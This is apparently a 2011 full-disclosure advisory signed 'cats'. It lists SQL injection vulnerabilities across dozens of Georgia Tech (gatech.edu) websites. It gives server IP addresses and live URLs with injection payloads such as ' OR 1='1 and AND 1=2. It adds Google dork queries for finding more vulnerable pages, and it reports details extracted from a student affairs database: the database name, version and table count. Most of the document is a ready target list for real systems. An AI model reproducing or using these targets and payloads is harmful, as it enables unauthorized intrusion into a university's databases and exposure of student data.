Georgia Tech SQL Injection

2011-01-0900:00:00
cats
packetstormsecurity.com
JSON
`*********************************************************  
Georgia Tech  
Multiple SQL Injection Vulnerabilities  
*********************************************************  
# #  
# )\._.,--....,'``. #  
# .b--. /; _.. \ _\ (`._ ,. #  
# `=,-,-'~~~ `----(,_..'--(,_..'`-.;.' #  
# #  
# Disclosure by: cats #  
# Domain: gatech.edu #  
# #  
# [1] Description #  
# [2] Extracted sample data #  
# [3] Vulnerabilities and details #  
# #  
*********************************************************  
  
  
[1] Description  
  
A large amount of vulnerabilities have been found in just  
about every site and service that gatech.edu has online.  
The ones listed here in this document are just a small  
amount of the real thing, and these are only SQL injections,  
which seems to be their biggest issue. And with a simple   
Google dork, a lot of more vulnerabilites can be found  
under this domain.  
  
Since one of their issues lies in /news/event.php, a   
simple Google search of that within the domain will show  
a lot of their affected sites.  
  
http://www.google.se/#q=gatech.edu&hl=en&ei=sEe5TMW5KMyVOv  
2R2YkN&start=70&sa=N&fp=e32992756bb43726  
  
https://encrypted.google.com/search?q=allinurl:+/news/even  
t.php%3Fid%3D+site:gatech.edu&hl=en&lr=&ei=2lHKTPm-IcSBlAf  
bnvHtCg&start=10&sa=N  
  
  
The people responsible for these services have been notified  
some time ago and they have had a lot of time to fix the   
issues, although it seems like they are ignoring the   
warnings.  
  
A very limited amount of sensitive information will be  
disclosed in this document (apart from the vulnerabilities).   
  
  
[2] Extracted sample data  
  
IP: 130.207.160.82  
URL: http://www.studentaffairs.gatech.edu/plugins/content/index.php?id=21  
Database username: [email protected]  
Database name: studentaffairs  
Database Version : 5.1.40-community-log  
Number of tables in database: 228  
  
  
[3] Vulnerabilities and details  
  
130.207.160.82  
http://www.chemistry.gatech.edu/events/special/index.php?sID=1%20AND%201=2  
http://www.successprograms.gatech.edu/plugins/content/index.php?id=181' OR 1='1  
http://www.studentaffairs.gatech.edu/plugins/content/index.php?id=21' OR 1='1   
http://webdev.gatech.edu/46/plugins/content/index.php?id=129' OR 1='1  
http://www.cqgrd.gatech.edu/story.php?id=5137%20AND%201=2  
http://www.crc.gatech.edu/plugins/content/index.php?id=351%27%20AND%201=%271  
http://www.chemistry.gatech.edu/news/release.php?id=4570%20AND%201=1  
http://www.inta.gatech.edu/news-events/news/release.php?id=5167%20AND%201=2  
http://www.inta.gatech.edu/news-events/events/event.php?id=6439%20AND%201=2  
http://www.cetl.gatech.edu/events/event.php?id=5830%27   
http://www.profpractice.gatech.edu/news/event.php?id=4019%20AND%201=1  
http://www.hts.gatech.edu/news/event.php?id=3679%20AND%201=1  
http://www.cope.gatech.edu/news/event.php?id=5900%20AND%201=1  
http://www.ptfe.gatech.edu/news/event.php?id=5367%20AND%201=1  
http://www.honor.gatech.edu/plugins/content/index.php?id=9%27%20AND%201=%271  
http://www.career.gatech.edu/plugins/content/index.php?id=241%27%20AND%201=%271  
http://www.gradcoop.gatech.edu/news/event.php?id=5112%20AND%201=2  
http://www.coop.gatech.edu/news/event.php?id=5208%20AND%201=2  
http://www.op.gatech.edu/news/story.php?id=1256%20AND%201=1  
  
128.61.179.103  
http://tempest.arch.gatech.edu/news/story.php?id=1233%20AND%201=1  
https://escol.coa.gatech.edu/news/story.php?id=1187%20AND%201=2  
  
130.207.91.98  
http://www.ptfe.gatech.edu/news/event.php?id=5803%20AND%201=2  
  
130.207.66.87  
http://www.biology.gatech.edu/news/story.php?id=5201%20AND%201=1  
http://www.test.biology.gatech.edu/news/story.php?id=3096%20AND%201=1  
  
128.61.135.12  
http://www.bme.gatech.edu/calendar/calendar_files/event_info.php?event_id=457%20AND%201=1  
  
130.207.243.18  
http://www.housing.gatech.edu/features/FeatureDisplay.cfm?FEATNO=159%20AND%201=2  
  
130.207.244.120  
http://www.gatech.edu/departments/index.html?id=1186%20AND%201=1%20--  
http://www.gatech.edu/contact/index.html?id=n5183%20AND%201=1   
http://www.gatech.edu/news-room/contact-person-news.php?id=1896&n=5183 AND 1=2   
  
Other (Mostly new ones, not checked for blind or visible SQLi)  
http://www.test.biology.gatech.edu/news/story.php?id=3096%20AND%201=1  
http://www.op.gatech.edu/news/story.php?id=1256%20AND%201=1  
http://tempest.arch.gatech.edu/news/story.php?id=1233%20AND%201=1  
https://escol.coa.gatech.edu/news/story.php?id=1187%20AND%201=2  
http://www2.me.gatech.edu/www/theses/summary.asp?db=1&LASTNAME=Abbasi&FIRSTNAME=Zubair'  
http://dcom.arch.gatech.edu/pcibim/memberscomment.asp?docid=30  
http://bim.arch.gatech.edu/app/bimtools/tool.asp?id=431&app_id=15  
http://bim.arch.gatech.edu/content_view.asp?id=550%20AND%201=1  
  
(Needs POST data, use the search field)  
http://www2.me.gatech.edu/www/theses/Search.asp  
  
  
#End of file  
`
JSON